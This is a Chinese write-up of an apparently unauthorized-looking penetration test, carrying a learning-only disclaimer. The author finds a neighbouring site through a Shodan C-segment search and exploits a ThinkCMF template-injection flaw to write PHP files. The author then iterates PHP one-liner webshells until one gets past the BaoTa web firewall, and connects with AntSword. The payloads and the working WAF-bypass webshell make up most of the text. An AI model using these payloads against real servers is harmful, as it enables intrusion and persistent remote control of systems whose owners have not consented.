记一次渗透测试(绕过某塔)

渗透技巧 2年前 (2022) admin
713 0 0

声明:该公众号大部分文章来自作者日常学习笔记,也有少部分文章是经过原作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系刘一手
请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。仅供学习研究

目标站: www.xxx.com

主站测试了没有找到突破口(不过多讲述了)

通过shodan查找旁站和c段

shodan   c段语法:net:”127.0.0.0/24″

找到了一个旁站    一个注册网站(在同一个c段里找到的)

记一次渗透测试(绕过某塔)
image-20220223193105683

目录扫描了一下(御剑后台扫描工具)

发现后台(好家伙,thinkcmf)

尝试了一波弱口令,无果

记一次渗透测试(绕过某塔)
image-20220223193221694

百度查该cms有无漏洞

https://www.cnblogs.com/0daybug/p/11790619.html

影响范围还挺广的

记一次渗透测试(绕过某塔)
image-20220223193645903

payload

?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('test.php','<?php phpinfo();?>')</php>

直接给bt防火墙拦截了(phpinfo()都拦截,哎)

记一次渗透测试(绕过某塔)
image-20220223194314869

换一个echo 输出看能不能

记一次渗透测试(绕过某塔)
image-20220223194414419

白屏了,说明没有拦截

访问test.php成功执行

记一次渗透测试(绕过某塔)
image-20220223194450603

接下来就是绕过宝塔getshell了

尝试一下原始的小马

<?php @eval($_POST[a]);
记一次渗透测试(绕过某塔)
image-20220223195035295

被拦截了

<?php @eval();
记一次渗透测试(绕过某塔)
image-20220223202822564

也被拦截了

既然eval()函数无法使用,我们尝试其他的可执行命令的函数?

更换assert()函数

一句话木马·

<?php assert(@$_POST['a']);

也是被拦截了

记一次渗透测试(绕过某塔)
image-20220223195700203
尝试只留assert()
记一次渗透测试(绕过某塔)
image-20220223195750855

成功执行(应该是$_POST[]被过滤了)

记一次渗透测试(绕过某塔)
image-20220223195926920
$_GET[],$_COOKIE[]  //都被过滤了

去掉[]进行尝试,可以过,没被拦截,单独的[]也没被拦截

记一次渗透测试(绕过某塔)
image-20220223200129314
记一次渗透测试(绕过某塔)
image-20220223200204578

尝试令_POST

<?php $b=$_POST;assert(@$b[a]);
记一次渗透测试(绕过某塔)
image-20220223200410053

白屏了,应该是过了,访问tets1.php  ,那个警告不用管,没报错

记一次渗透测试(绕过某塔)
image-20220223200638424

执行下phpinfo()

记一次渗透测试(绕过某塔)
image-20220223200607213

使用蚁剑进行连接

记一次渗透测试(绕过某塔)
image-20220223200745786

返回数据为空

将编码器改为random,成功连接

记一次渗透测试(绕过某塔)
image-20220223200823907

over

记一次渗透测试(绕过某塔)



记一次渗透测试(绕过某塔)


推荐阅读



干货 | 渗透知识库(鹏组安全)


信息安全 | 键盘记录之信息窃取(登录框密码隐藏就真的万无一失吗)


python | 用python写了一个谈恋爱AA公式,我被分手了


好文分享收藏赞一下最美点在看哦


原文始发于微信公众号(鹏组安全):记一次渗透测试(绕过某塔)

版权声明:admin 发表于 2022年2月24日 下午1:45。
转载请注明:记一次渗透测试(绕过某塔) | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...